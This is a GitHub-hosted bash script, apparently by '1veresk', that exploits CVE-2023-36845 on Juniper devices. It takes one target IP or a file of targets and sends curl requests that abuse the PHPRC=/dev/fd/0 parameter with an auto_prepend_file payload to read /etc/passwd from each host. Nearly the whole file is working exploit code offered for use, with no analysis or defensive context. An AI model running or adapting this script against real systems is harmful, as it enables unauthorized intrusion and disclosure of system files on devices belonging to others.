-
Notifications
You must be signed in to change notification settings - Fork 0
/
cve-2023-36845-6.sh
33 lines (29 loc) · 1.3 KB
/
cve-2023-36845-6.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#!/usr/bin/env bash
TARGET=$1
# Checking if we have a target to attack
if [ -z "$TARGET" ];then
TARGET="-h"
fi
# Small standart how-to.
if [ -z "$TARGET" ] || [ "$TARGET" == "-h" ];then
echo "----------------Welcome-to-cve-2023-36845-6-script-by-1veresk----------+";
echo "+----------------------------------------------------------------------+";
echo "+-------------------For-The-Help---------------------------------------+";
echo "Example#1: ./cve-2023-36845-6.sh -h------------------------------------+";
echo "+-------------------For-The-URL-Check----------------------------------+";
echo "Example#1: ./cve-2023-36845-6.sh <TARGET_IP> --------------------------+";
echo "+-------------------For-The-File-Check---------------------------------+";
echo "Example#1: ./cve-2023-36845-6.sh <TARGET_IP> --------------------------+";
echo "+----------------------------------------------------------------------+";
exit 1;
fi
# Attacking Target
if [ -e "$TARGET" ];then
while read LINE; do
echo "attacking the HOST $LINE"
curl -kv "https://${LINE}/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'
done <$TARGET
else
echo "+---attacking the HOST $TARGET------------------------+"
curl -kv "https://${TARGET}/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'
fi